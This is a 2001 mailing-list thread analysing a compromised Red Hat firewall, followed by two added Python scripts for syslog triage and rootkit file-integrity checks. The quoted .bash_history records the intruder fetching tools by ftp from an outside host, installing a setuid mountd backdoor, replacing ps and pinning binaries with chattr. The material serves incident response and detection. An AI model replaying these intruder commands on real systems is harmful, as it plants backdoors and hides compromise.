[CLUE-Tech] Fwd: Re: blitznet crack attack

Dan Harris coronadh at coronasolutions.com
Fri Jun 15 09:21:09 MDT 2001


Oops, I almost forgot the bonus question...

The cracker installed a "rootkit".  A rootkit is composed of some basic
utilities that masquerade as valid services.  You'll see he replaced mountd
and some lib files with his own custom daemon.  This custom daemon probably
allowed him to connect to a predefined port and dump him right into a root
shell so that he can cause damage later.  This is called "owning" a box.

As to how he got in, it's hard to say, but my best guess is that he found a 
buffer overflow with one of the running daemons and stuffed the buffer with 
a "useradd" command so that he could then login to a shell.

If the above scenario is true, the biggest mistake was made by not keeping
up with security updates regarding the daemons the admin was running.  Good
for him to use portsentry, but in this case the cracker obviously knew
exactly what exploit was available on the box... could be one of hundreds of
known exploits.

-Dan Harris

> Bonus Questions: What did the cracker do, and how did he get in? How
> could this have been prevented?
> 
> -JimI.
> 
> Jim Intriglia
> IT Systems and Software Developer
> www.JimIntriglia.com
> 
> Forwarded Message:
>> To: jimintriglia at americanisp.net
>> From: "Jim Intriglia" <jimintriglia at hotmail.com>
>> Subject: Fwd: Re: [Abacus] blitznet hack
>> Date: Fri, 15 Jun 2001 12:39:46 
>> -----
>> 
>> 
>> 
>> >From: "J.D. Stevens" <dave at stevens.com>
>> >To: Ian Campbell <ijac79 at hotmail.com>
>> >CC: abacus at psionic.com
>> >Subject: Re: [Abacus] blitznet hack
>> >Date: Fri, 15 Jun 2001 06:19:12 -0500
>> >
>> >Disconnect from the Internet. Put in a new disk drive for the operating
>> >system. Install the operating system of your choice. Install ALL SECURITY
>> >PATCHES. Disable any unnecessary services. Put in appropriate monitoring,
>> >blocking, and notification software. I use Tripwire, Portsentry, and Logcheck.
>> >Change all passwords on any machines that this one could sniff. Mount the
>> >hacked disk read-only in order to extract configurations, account
>> >information, etc.
>> >
>> >Be sure to check any systems accessible from or through the hacked machine.
>> >Who knows what they picked up with the sniffer.
>> >
>> >Hackers got into my RH 6.2 machine in January through wu-ftpd. I had it
>> >configured properly, but didn't get a security patch in soon enough. After I
>> >rebuilt, they tried many more times to break in. So far so good. There are
>> >several vulnerabilities in RH 6.2 as it comes out of the box. The Red Hat web
>> >site has information on steps to take to secure the system.
>> >
>> >My server is a leased system at Rackspace. They provided excellent support
>> >after the hack. They provided the suggestion to put in the new drive and
>> >mount the old one read-only. They had the new drive and OS installed within
>> >four hours of my call. It took me an additional 14 hours to reconfigure the
>> >system. I do all of the work remotely. I've never seen or touched the server.
>> >
>> >   Good luck,
>> >
>> >   Dave Stevens
>> >   STEVENS.COM, Inc.
>> >   Houston, TX, USA
>> >
>> >Ian Campbell wrote:
>> > >
>> > > Well, got a bit of shock this morning when I couldn't ssh into the
>> > > firewall at a client site.  I got one of the techs there to have a look
>> > > and sure enough at the login was the message "eth0 running in promiscous
>> > > mode'  Not a good start.
>> > >
>> > > The logs shows a lot of things that I don't want to see.
>> > >
>> > >
>> > >
>> > > Jun 15 04:54:33 gw inet: inetd shutdown succeeded
>> > > Jun 15 04:54:34 gw inetd[5384]: Bad config for ALL:ALL: Incomplete config entry (skipped)
>> > > Jun 15 04:54:34 gw inet: inetd startup succeeded
>> > > Jun 15 04:55:17 gw inet: inetd shutdown succeeded
>> > > Jun 15 04:55:17 gw inet: inetd startup succeeded
>> > > Jun 15 05:01:51 gw PAM_pwdb[5628]: (su) session opened for user daemon by (uid=0)
>> > > Jun 15 05:01:55 gw modprobe: Note: /etc/conf.modules is more recent than /lib/modules/2.2.14-5.0/modules.dep
>> > > Jun 15 05:01:55 gw modprobe: modprobe: Can't locate module net-pf-10
>> > > Jun 15 05:02:24 gw PAM_pwdb[5628]: (su) session closed for user daemon
>> > > Jun 15 05:03:07 gw PAM_pwdb[5642]: (su) session opened for user daemon by (uid=0)
>> > > Jun 15 05:03:09 gw modprobe: Note: /etc/conf.modules is more recent than /lib/modules/2.2.14-5.0/modules.dep
>> > > Jun 15 05:03:09 gw modprobe: modprobe: Can't locate module net-pf-10
>> > > Jun 15 05:03:59 gw portsentry[682]: attackalert: Connect from host: proxy5.monitor.dal.net/130.227.3.123 to TCP port: 1080
>> > > Jun 15 05:03:59 gw portsentry[682]: attackalert: Host 130.227.3.123 has been blocked via wrappers with string: "ALL: 130.227.3.123"
>> > > Jun 15 05:04:00 gw portsentry[682]: attackalert: Host 130.227.3.123 has been blocked via dropped route using command: "/sbin/ipchains -I input -s 130.227.3.123 -j DENY -l"
>> > > Jun 15 05:04:00 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=47800 F=0x4000 T=48 SYN (#1)
>> > > Jun 15 05:04:03 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=48032 F=0x4000 T=48 SYN (#1)
>> > > Jun 15 05:04:09 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=48556 F=0x4000 T=48 SYN (#1)
>> > > Jun 15 05:04:21 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=49656 F=0x4000 T=48 SYN (#1)
>> > > Jun 15 05:04:45 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=51276 F=0x4000 T=48 SYN (#1)
>> > > Jun 15 05:07:12 gw modprobe: Note: /etc/conf.modules is more recent than /lib/modules/2.2.14-5.0/modules.dep
>> > > Jun 15 05:07:12 gw modprobe: modprobe: Can't locate module net-pf-10
>> > > Jun 15 05:07:20 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=64668 F=0x4000 T=48 SYN (#1)
>> > > Jun 15 05:07:23 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=64878 F=0x4000 T=48 SYN (#1)
>> > > Jun 15 05:07:29 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=65170 F=0x4000 T=48 SYN (#1)
>> > > Jun 15 05:07:41 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=256 F=0x4000 T=48 SYN (#1)
>> > > Jun 15 05:08:05 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:4736 203.22.71.55:1080 L=44 S=0x60 I=1618 F=0x4000 T=48 SYN (#1)
>> > > Jun 15 05:16:51 gw PAM_pwdb[5642]: (su) session closed for user daemon
>> > > Jun 15 05:17:48 gw kernel: libtty uses obsolete (PF_INET,SOCK_PACKET)
>> > > Jun 15 05:17:48 gw kernel: eth0: Promiscuous mode enabled.
>> > > Jun 15 05:17:48 gw kernel: device eth0 entered promiscuous mode
>> > >
>> > >
>> > > .bash_history shows what they were up to
>> > >
>> > > ls -al
>> > > pico /etc/inetd.conf
>> > > /etc/et
>> > > /etc/rc.d/init.d/inet restart
>> > > cd /lib/libx.so
>> > > ls -al
>> > > mv xp mountd
>> > > chmod +xs mountd
>> > > ls -al
>> > > ftp h9.s5.com
>> > > ls -al
>> > > hostname
>> > > gunzip *.gz
>> > > ls -al
>> > > tar -xvf blitznet.tar
>> > > tar -xvf psyBNC2.2.1.tar
>> > > ls -al
>> > > rm *.tar
>> > > chown daemon psybnc
>> > > chgrp daemon psybnc
>> > > cd psybnc
>> > > make
>> > > chown daemon *
>> > > chgrp daemon *
>> > > su daemon
>> > > locate bnc
>> > > locate psybnc
>> > > find / -name psybnc
>> > > cd /
>> > > locate bnc
>> > > cd /lib/libx.so
>> > > ls -al
>> > > cd psybnc
>> > > su daemon
>> > > ls -al
>> > > cd ..
>> > > ls -al
>> > > mv lib libtty
>> > > chmod +x libtty ps
>> > > chmod +xs wipe
>> > > ls -al
>> > > ./ps psybnc libtty mountd hellnine slice2
>> > > chattr +ai /bin/ps
>> > > chattr +ai /bin/.ps
>> > > chattr +ai /bin/login
>> > > ls -al
>> > > ./libtty
>> > > ps -aux
>> > > ls -al
>> > > uptime
>> > > exit
>> > >
>> > >
>> > > So, I'm still not sure how they actually got in.  The box is running
>> > > redhat 6.2 without any patches.  What now.  How can I clean my system?
>> > >
>> > > Should I be upgrading my inetd version?  Can anyone offer any advice or
>> > > point me to a security list that can?
>> > >
>> > > Going to be a busy day.
>> > >
>> > > Ian
>> > >
>> > > 
>> > >
>> >
>> >--
>> >=====================================================================
>> >Dave Stevens      |    dave at stevens.com   |    http://www.stevens.com
>> >STEVENS.COM, Inc. |      713-419-0313     | http://www.prettygood.net
>> >                   |    Houston, TX, USA   |
>> >=====================================================================
>> 
>> 
>> 
> 
> 
> _______________________________________________
> CLUE-Tech mailing list
> CLUE-Tech at clue.denver.co.us
> http://clue.denver.co.us/mailman/listinfo/clue-tech
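The syslog excerpt in Ian's message carries several indicators that are worth picking out automatically rather than by eye: inetd restarted on a freshly edited config that no longer parses, root using su to drop into the daemon account (the account psybnc was later chowned to), a program calling itself libtty opening a raw packet socket, and eth0 entering promiscuous mode. The triage script below is an added example written for this page, not code from any poster in the thread and not part of portsentry or Logcheck. The indicator names, severities and the sample lines (modelled on the excerpt, with one constructed sshd line as a benign control) are my own assumptions.

```python
"""Syslog triage for the post-compromise indicators seen in the gw excerpt.

Added example (not from the thread). Indicator names and severities are assumptions.
"""
import re
from collections import Counter

# Constructed sample, modelled on Ian's excerpt; the sshd line is a benign control.
SAMPLE_LOG = """\
Jun 15 04:54:34 gw inetd[5384]: Bad config for ALL:ALL: Incomplete config entry (skipped)
Jun 15 04:54:34 gw inet: inetd startup succeeded
Jun 15 05:01:51 gw PAM_pwdb[5628]: (su) session opened for user daemon by (uid=0)
Jun 15 05:01:55 gw modprobe: modprobe: Can't locate module net-pf-10
Jun 15 05:03:59 gw portsentry[682]: attackalert: Connect from host: proxy5.monitor.dal.net/130.227.3.123 to TCP port: 1080
Jun 15 05:04:00 gw kernel: Packet log: input DENY eth1 PROTO=6 130.227.3.123:1604 203.22.71.55:1080 L=44 S=0x60 I=47800 F=0x4000 T=48 SYN (#1)
Jun 15 05:17:48 gw kernel: libtty uses obsolete (PF_INET,SOCK_PACKET)
Jun 15 05:17:48 gw kernel: eth0: Promiscuous mode enabled.
Jun 15 05:17:48 gw kernel: device eth0 entered promiscuous mode
Jun 15 06:12:03 gw sshd[700]: Accepted password for ian from 10.0.0.5 port 40000 ssh2
"""

# "Mon DD HH:MM:SS host prog[pid]: message" (classic BSD syslog line layout).
SYSLOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[^:\[\s]+)(?:\[\d+\])?: (?P<msg>.*)$"
)

# (indicator, severity, pattern applied to the message part). The named group
# "who" captures the interesting actor: the account su'd into, the program that
# opened a raw socket, or the remote host portsentry reported.
INDICATORS = [
    ("sniffer_promiscuous_mode", "high", re.compile(r"promiscuous mode", re.I)),
    ("raw_packet_socket", "high",
     re.compile(r"^(?P<who>\S+) uses obsolete \(PF_INET,SOCK_PACKET\)")),
    ("root_su_to_service_account", "medium",
     re.compile(r"\(su\) session opened for user (?P<who>\S+) by \(uid=0\)")),
    ("inetd_config_error", "medium", re.compile(r"^Bad config for ")),
    ("inetd_restart", "low", re.compile(r"^inetd (?:shutdown|startup) succeeded$")),
    ("portsentry_alert", "info",
     re.compile(r"attackalert: Connect from host: (?P<who>\S+)")),
]


def triage(log_text):
    """Return one finding dict per (line, indicator) match, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue  # not a syslog line we understand: skip rather than guess
        for name, severity, pat in INDICATORS:
            hit = pat.search(m["msg"])
            if hit:
                findings.append({
                    "ts": m["ts"], "prog": m["prog"], "indicator": name,
                    "severity": severity, "who": hit.groupdict().get("who"),
                })
    return findings


def severity_counts(findings):
    return Counter(f["severity"] for f in findings)


def raw_socket_programs(findings):
    """Programs that opened SOCK_PACKET sockets: candidates for a planted sniffer."""
    return {f["who"] for f in findings if f["indicator"] == "raw_packet_socket"}


def root_switched_to(findings):
    """Service accounts that root dropped into with su (psybnc ran as daemon above)."""
    return {f["who"] for f in findings if f["indicator"] == "root_su_to_service_account"}


def verdict(findings):
    counts = severity_counts(findings)
    if counts["high"]:
        return "likely compromised: sniffer indicators present"
    if counts["medium"]:
        return "suspicious: review service and privilege changes"
    return "no indicators"


if __name__ == "__main__":
    found = triage(SAMPLE_LOG)
    for f in found:
        print(f"{f['ts']} {f['severity']:6} {f['indicator']:28} {f['prog']} {f['who'] or ''}")
    print(verdict(found), dict(severity_counts(found)))
```

The point of keeping the program name from the SOCK_PACKET warning is that a sniffer announces itself twice in this excerpt: once by the kernel naming the process that opened the raw socket, and once by the interface going promiscuous a moment later. Either line alone is a strong signal; the pair, with the same timestamp, is the kind of correlation a tool like Logcheck can be taught to escalate.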
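Dan's answer describes the rootkit as replaced system binaries plus a setuid backdoor, and the .bash_history shows exactly where: a setuid mountd placed under /lib/libx.so (a directory named like a library), /bin/ps swapped for a trojan with the original kept as /bin/.ps, and chattr +ai used to pin the replacements in place. Dave's rebuild list includes Tripwire, and the check below is a small Tripwire-style baseline comparison plus three heuristics that need no baseline at all. It is an added example written for this page, not Tripwire and not anyone's code from the thread; it replays the intruder's file changes in a temporary directory of constructed stand-in files, and the directory list and heuristics are my own assumptions. The immutable attribute is not checked here because lsattr is Linux-specific.

```python
"""Tripwire-style baseline diff plus baseline-free heuristics for the traces in
the .bash_history above. Added example, not Tripwire; constructed sample tree."""
import hashlib
import os
import stat
import tempfile
from pathlib import Path

# Directories where setuid binaries are expected to live (assumption for the demo).
SYSTEM_BIN_DIRS = {"bin", "sbin", "usr/bin", "usr/sbin"}


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: Path) -> dict:
    """Relative path -> (sha256, permission bits) for every regular file under root."""
    snap = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            snap[p.relative_to(root).as_posix()] = (sha256_file(p), stat.S_IMODE(p.stat().st_mode))
    return snap


def diff_snapshots(before: dict, after: dict) -> dict:
    """Files added, removed, or whose content or mode changed since the baseline."""
    return {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "changed": sorted(k for k in before.keys() & after.keys() if before[k] != after[k]),
    }


def suspicious_files(root: Path) -> list:
    """Heuristics that need no baseline; each hit is (relative path, reason)."""
    hits = []
    for p in root.rglob("*"):
        rel = p.relative_to(root).as_posix()
        parent = p.parent.relative_to(root).as_posix()
        if p.is_dir():
            if p.name.endswith(".so"):  # /lib/libx.so was a directory, not a library
                hits.append((rel, "directory named like a shared library"))
            continue
        if not p.is_file() or p.is_symlink():
            continue
        mode = p.stat().st_mode
        if mode & (stat.S_ISUID | stat.S_ISGID) and parent not in SYSTEM_BIN_DIRS:
            hits.append((rel, "setuid/setgid file outside system bin directories"))
        if p.name.startswith(".") and mode & stat.S_IXUSR and parent in SYSTEM_BIN_DIRS:
            hits.append((rel, "hidden executable in a system bin directory"))
    return sorted(hits)


def _write(path: Path, data: bytes, mode: int = 0o755) -> None:
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_bytes(data)
    path.chmod(mode)


def run_demo() -> dict:
    """Constructed scenario: clean tree, take baseline, replay the history's file changes."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        _write(root / "bin/ps", b"#!/bin/sh\n# stand-in for the genuine ps\n")
        _write(root / "bin/login", b"#!/bin/sh\n# stand-in for the genuine login\n")
        _write(root / "usr/sbin/rpc.mountd", b"#!/bin/sh\n# stand-in for the genuine mountd\n")
        before = snapshot(root)
        # "mv xp mountd; chmod +xs mountd" inside /lib/libx.so
        _write(root / "lib/libx.so/mountd", b"#!/bin/sh\n# backdoor stand-in\n", 0o755 | stat.S_ISUID)
        # original ps kept as /bin/.ps, a replacement dropped in its place
        os.rename(root / "bin/ps", root / "bin/.ps")
        _write(root / "bin/ps", b"#!/bin/sh\n# replaced ps stand-in\n")
        after = snapshot(root)
        return {"diff": diff_snapshots(before, after), "suspicious": suspicious_files(root)}


if __name__ == "__main__":
    result = run_demo()
    for key, paths in result["diff"].items():
        print(f"{key:8} {paths}")
    for rel, reason in result["suspicious"]:
        print(f"SUSPICIOUS {rel}: {reason}")
```

Two design points follow from the thread. First, the baseline has to be taken and stored off the box before the compromise, and compared from known-good tools booted from clean media; a ps or login that has been replaced will happily lie about itself, which is why Dave mounts the old disk read-only under a fresh install. Second, the heuristics catch what a baseline cannot, because a file that never existed (lib/libx.so/mountd, bin/.ps) has no baseline entry to diverge from; on a real Linux box, running lsattr over the flagged paths would also surface the +ai attributes set in the history.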
